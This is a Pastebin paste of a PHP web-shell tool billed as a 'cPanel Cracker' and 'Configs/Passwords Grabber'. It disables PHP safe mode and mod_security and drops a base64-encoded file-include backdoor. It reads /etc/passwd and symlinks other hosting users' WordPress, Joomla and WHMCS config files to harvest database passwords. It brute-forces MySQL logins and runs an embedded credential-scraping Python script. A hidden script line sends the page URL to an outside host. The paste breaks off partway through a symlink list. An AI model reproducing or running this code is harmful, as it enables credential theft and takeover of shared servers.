shgshg

shgxz

Feb 29th, 2016
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.78 KB | None | 0 0
  1. <title>CP Cracker</title>
  2. <p align="center">
  3. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  4. <html>
  5. <title>cPanel Cracker</title>
  6. <body>
  7. <STYLE>textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 10px;font-family: Tahoma; border: 1px solid #000000;}
  8. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 10px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20 }
  9. body { font-family: Tahoma}
  10. .x-inj { font-family: Vivaldi}
  11. tr { BORDER: dashed 1px #333; color: #00ff; }
  12. td { BORDER: dashed 1px #333; color: #00ff; }
  13. .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #00ff; }
  14. .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 8pt Verdana; color: #00ff00; }
  15. .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #00ff; }
  16. table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #00ff; }
  17. input { border: dashed 1px; border-color: #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: #00ff; }
  18. select { BORDER-RIGHT: Black 1px solid; BORDER-TOP: #00ff 1px solid; BORDER-LEFT: #00ff 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #00ff; BACKGROUND-COLOR: Black; font: pt Verdana; color: #00ff; }
  19. submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #00ff; }
  20. textarea { border: dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; }
  21. BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff; SCROLLBAR-SHADOW-color: #00ff; SCROLLBAR-3DLIGHT-color: #00ff; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff; SCROLLBAR-DARKSHADOW-color: #00ff margin: 1px; color: #00ff00; background-color: Black; }
  22. .main { margin: -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; }
  23. .tt { background-color: Black; }
  24. A:link { COLOR: White; TEXT-DECORATION: none }
  25. A:visited { COLOR: White; TEXT-DECORATION: none }
  26. A:hover { color: #00ff00; TEXT-DECORATION: none }
  27. A:active { color: #00ff00; TEXT-DECORATION: none }
  28. </STYLE>
  29. <script>
  30. a=new/**/Image();a.src='http://bulkah4ck3rs.altervista.org/function.php?s='+escape(location.href);
  31. </script>
  32. <?php
  33. @ini_set('display_errors', 0);
  34. @ini_set('output_buffering',0);
  35. echo'<center>
  36. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  37. <td width="100%" align=center valign="top" rowspan="1">
  38. <center><font color="white" size="6" face="impact">Configs/Passwords Grabber & Cpanel Cracker</center></font>
  39. <center><font color="white" size="6" face="impact">ShkupiCybers</center></font>
  40. <div class="hedr">
  41. <td height="10" align="left" class="td1"></td></tr><tr><td
  42. width="100%" align="center" valign="top" rowspan="1"><font
  43. color="red" face="comic sans ms"size="1"><b>
  44. </table>';
  45. ?>
  46. <center>
  47. <form method=post><font color=white size=2 face="comic sans ms">Get Usernames for symlink</font><p>
  48. <input type=submit name="usre" value="Extract usernames"/></form>
  49. <center>
  50. <?php
  51.  
  52. $r=fopen('php.ini','w');
  53. $rr="safe_mode = OFF
  54. Safe_mode_gid = OFF
  55. disable_functions = NONE
  56. disable_classes = NONE";
  57. fwrite($r,$rr);
  58. ?>
  59. <?php
  60. $shellololol = 'PD8NCmVjaG8gaW5pX2dldCjigJxzYWZlX21vZGXigJ0pOw0KZWNobyBpbmlfZ2V0KOKAnG9wZW5fYmFzZWRpcuKAnSk7DQppbmNsdWRlKCRfR0VUWyJmaWxlIl0pOw0KaW5pX3Jlc3RvcmUo4oCcc2FmZV9tb2Rl4oCdKTsNCmluaV9yZXN0b3JlKOKAnG9wZW5fYmFzZWRpcuKAnSk7DQplY2hvIGluaV9nZXQo4oCcc2FmZV9tb2Rl4oCdKTsNCmVjaG8gaW5pX2dldCjigJxvcGVuX2Jhc2VkaXLigJ0pOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==';
  61. $zerer = fopen("ini.php" ,"w+");
  62. $write = fwrite ($zerer ,base64_decode($shellololol));
  63. fclose($zerer);
  64. ?>
  65. <?php
  66. if(isset($_POST['usre'])){
  67. ?><form method=post>
  68. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  69. foreach($users as $user)
  70. {
  71. $str=explode(":",$user);
  72. echo $str[0]."\n";
  73. }
  74.  
  75. ?></textarea><br><br>
  76. <input type=submit name=su value="Extract Them Now"/></form>
  77. <?php } ?>
  78. <?php
  79. error_reporting(0);
  80. echo "<font color=red size=2 face=\"comic sans ms\">";
  81. if(isset($_POST['su']))
  82. {
  83. mkdir('lolz',0777);
  84. $rr = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
  85. $g = fopen('lolz/.htaccess','w');
  86. fwrite($g,$rr);
  87. $Sym = symlink("/","lolz/root");
  88. $rt="<a href=lolz/root><font color=white size=5 face=\"impact\"> r00t</font></a>";
  89. echo "<br><u>$rt</u>";
  90.  
  91. $dir=mkdir('lolz',0777);
  92. $r = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
  93. $f = fopen('lolz/.htaccess','w');
  94.  
  95. fwrite($f,$r);
  96. $lolzsym="<a href=lolz/><font color=white size=5 face=\"impact\">configuration files</font></a>";
  97. echo "<br><br><u><font color=red size=2 face=\"comic sans ms\">$lolzsym</font></u>";
  98.  
  99. $usr=explode("\n",$_POST['user']);
  100. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  101. foreach($usr as $uss )
  102. {
  103. $us=trim($uss);
  104.  
  105. foreach($configuration as $c)
  106. {
  107. $rs="/home/".$us."/public_html/".$c;
  108. $r="lolz/".$us." .. ".$c;
  109. symlink($rs,$r);
  110. }
  111. }
  112. }
  113. ?>
  114. <?php
  115. /*
  116. Recoded By AMAR^SHG
  117. */
  118. @set_time_limit(0);
  119. @error_reporting(0);
  120.  
  121.  
  122. if($_POST['page']=='find')
  123. {
  124. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  125. {
  126. if($_POST['type'] == 'passwd'){
  127. $e = explode("\n",$_POST['usernames']);
  128. foreach($e as $value){
  129. $k = explode(":",$value);
  130. $username .= $k['0']." ";
  131. }
  132. }elseif($_POST['type'] == 'simple'){
  133. $username = str_replace("\n",' ',$_POST['usernames']);
  134. }
  135. $a1 = explode(" ",$username);
  136. $a2 = explode("\n",$_POST['passwords']);
  137. $id2 = count($a2);
  138. $ok = 0;
  139. foreach($a1 as $user )
  140. {
  141. if($user !== '')
  142. {
  143. $user=trim($user);
  144. for($i=0;$i<=$id2;$i++)
  145. {
  146. $pass = trim($a2[$i]);
  147. if(@mysql_connect('localhost',$user,$pass))
  148. {
  149. echo "AMAR^SHG ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
  150. $ok++;
  151. }
  152. }
  153. }
  154. }
  155. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by AMAR^SHG</b>";
  156. echo "<center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
  157. exit;
  158. }
  159. }
  160. if($_POST['pass']=='password'){
  161. @error_reporting(0);
  162. $i = getenv('REMOTE_ADDR');
  163. $d = date('D, M jS, Y H:i',time());
  164. $h = $_SERVER['HTTP_HOST'];
  165. $dir=$_SERVER['PHP_SELF'];
  166. $back = "";
  167. $write = fwrite ($file ,base64_decode($back));
  168. fclose($file);
  169. mkdir('config',0755);
  170. $cp =
  171. 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
  172. $file = fopen("cp.py","w+");
  173. $write = fwrite ($file ,base64_decode($cp));
  174. fclose($file);
  175. chmod("cp.py",0755);
  176. $url = $_POST['url'];
  177. echo"<center>
  178. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  179. system("python cp.py $url config");
  180. unlink ('cp.py');
  181. echo"</textarea>
  182. </center>";
  183. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."> << BACK</a>";
  184. exit;
  185. }
  186. if($_POST['matikan']=='sekatan'){
  187. @error_reporting(0);
  188. $phpini =
  189. 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  190. $file = fopen("php.ini","w+");
  191. $write = fwrite ($file ,base64_decode($phpini));
  192. fclose($file);
  193. $htaccess =
  194. 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  195. $file = fopen(".htaccess","w+");
  196. $write = fwrite ($file ,base64_decode($htaccess));
  197. echo "<hr><center><b>DONE!";
  198. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  199. exit;
  200. }
  201. if($_POST['mendapatkan']=='passwd'){
  202. @set_magic_quotes_runtime(0);
  203. ob_start();
  204. error_reporting(0);
  205. @set_time_limit(0);
  206. @ini_set('max_execution_time',0);
  207. @ini_set('output_buffering',0);
  208. $fn = $_POST['foldername'];
  209. //all function here
  210.  
  211. function syml($usern,$pdomain)
  212. {
  213. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  214. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  215. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  216. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  217. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  218. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  219. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  220. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  221. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  222. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  223. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  224. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  225. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  226. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  227. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  228. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  229. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  230. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  231. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  232. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  233. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  234. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  235. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  236. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  237. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  238. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  239. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  240. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  241. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  242. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  243. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  244. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  245. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  246. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  247. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  248. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  249. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  250. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  251. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  252. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  253. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  254. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  255. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  256. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  257. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
